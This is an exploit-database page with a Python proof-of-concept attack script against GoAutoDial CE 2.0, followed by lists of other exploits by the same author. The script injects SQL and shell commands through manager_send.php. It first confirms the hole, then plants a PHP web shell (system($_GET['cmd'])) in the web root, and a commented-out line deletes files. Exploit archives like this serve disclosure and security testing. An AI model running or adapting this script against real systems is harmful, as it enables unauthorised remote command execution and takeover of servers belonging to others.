Menu

Search for hundreds of thousands of exploits

"GoAutoDial CE 2.0 - Arbitrary File Upload"

Author

Exploit author

R-73eN

Platform

Exploit platform

php

Release date

Exploit published date

2015-02-28

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
# Title : GoAutoDial CE 2.0 Shell Upload
# Date : 28/02/2015 
# Author : R-73eN
# Software : GoAutoDial CE 2.0
# Tested : On Linux vicisrv.loc 2.6.18-238.9.1.el5.goPAE #1  GoAutoDial CE 2.0

import socket
import sys
banner = "\n\n"
banner +="  ___        __        ____                 _    _  \n"  
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
print banner
CRLF = "\r\n"
def checkvuln():
	command = "uname"
	evil = path + '/manager_send.php?enable_sipsak_messages=1&allow_sipsak_messages=1&protocol=sip&ACTION=OriginateVDRelogin&session_name=AAAAAAAAAAAA&server_ip=%27%20OR%20%271%27%20%3D%20%271&extension=%3B' + command + '%3B&user=' + user + '&pass=' + password
	s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect((host,80))
	evilREQ = 'GET ' + evil + ' HTTP/1.1' + CRLF + 'Host: ' + host + CRLF + 'User-Agent: Infogen-AL' + CRLF + CRLF + CRLF
	s.send(evilREQ)
	a = s.recv(1024)
	if(a.find("HTTP/1.1 200 OK") != -1 and a.find("Linux") != -1):
		print '[ + ] Server Is vulnerable [ + ]\n'
		shellupload()
	else: 
		print '[ - ] Server is not vulnerable [ - ]\n'
	s.close()


def shellupload():
	command = "echo 'Infogen-AL<br><?php echo system($_GET['cmd']);?>' > /var/www/html/infogen.php"
	#command = "rm /var/www/html/123.pl;rm /var/www/html/TEST.perl"
	command = command.replace(" ", "%20")
	evil = path + '/manager_send.php?enable_sipsak_messages=1&allow_sipsak_messages=1&protocol=sip&ACTION=OriginateVDRelogin&session_name=AAAAAAAAAAAA&server_ip=%27%20OR%20%271%27%20%3D%20%271&extension=%3B' + command + '%3B&user=' + user + '&pass=' + password
	s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect((host,80))
	evilREQ = 'GET ' + evil + ' HTTP/1.1' + CRLF + 'Host: ' + host + CRLF + 'User-Agent: Infogen-AL' + CRLF + CRLF + CRLF
	s.send(evilREQ)
	a = s.recv(1024)
	if(a.find("HTTP/1.1 200 OK") != -1 and a.find("Invalid") == -1):
		print '[ + ] Shell uploaded successfully [ + ]\n'
		print '[ + ] http://' + host + '/infogen.php [ + ]\n'
	else:
		print '[ - ] Shell upload failed.... [ - ]'
	s.close()

if(len(sys.argv) < 4):
	print '\n Usage : exploit.py 127.0.0.1 /goautodial-agent/ agentuser agentpassword\n'
else:
	host = sys.argv[1]
	path = sys.argv[2]
	user = sys.argv[3]
	password = sys.argv[4]
	checkvuln()
	print 'Visit Us : http://infogen.al/'
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2016-12-07 "Dual DHCP DNS Server 7.29 - Denial of Service" dos windows R-73eN
2016-11-08 "Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution" local windows R-73eN
2016-10-06 "Billion 7700NR4 Router - Remote Command Execution" remote hardware R-73eN
2016-09-29 "KeepNote 0.7.8 - Command Execution" local multiple R-73eN
2016-09-28 "Symantec Messaging Gateway 10.6.1 - Directory Traversal" webapps java R-73eN
2016-05-13 "runAV mod_security - Arbitrary Command Execution" local linux R-73eN
2016-04-08 "Express Zip 2.40 - Directory Traversal" local windows R-73eN
2015-12-26 "EasyCafe Server 2.2.14 - Remote File Read" remote windows R-73eN
2015-12-21 "Notepad++ NPPFtp Plugin 0.26.3 - Buffer Overflow" dos windows R-73eN
2015-12-18 "pfSense 2.2.5 - Directory Traversal" webapps php R-73eN
2015-12-12 "GoAutoDial CE 3.3 - Multiple Vulnerabilities" webapps php R-73eN
2015-10-02 "WinRar < 5.30 Beta 4 - Settings Import Command Execution" local windows R-73eN
2015-09-25 "WinRar 5.21 - SFX OLE Command Execution" local windows R-73eN
2015-09-20 "Konica Minolta FTP Utility 1.0 - Remote Command Execution" remote windows R-73eN
2015-09-17 "ZTE PC UI USB Modem Software - Local Buffer Overflow" local windows R-73eN
2015-09-11 "Microsoft Windows Media Center - Command Execution (MS15-100)" remote windows R-73eN
2015-04-21 "ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution" remote linux R-73eN
2015-02-28 "Microsoft Word 2007 - RTF Object Confusion (ASLR + DEP Bypass)" local windows R-73eN
2015-02-28 "GoAutoDial CE 2.0 - Arbitrary File Upload" webapps php R-73eN
2015-02-14 "PCMan FTP Server 2.0.7 - 'MKD' Remote Buffer Overflow" remote windows R-73eN
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.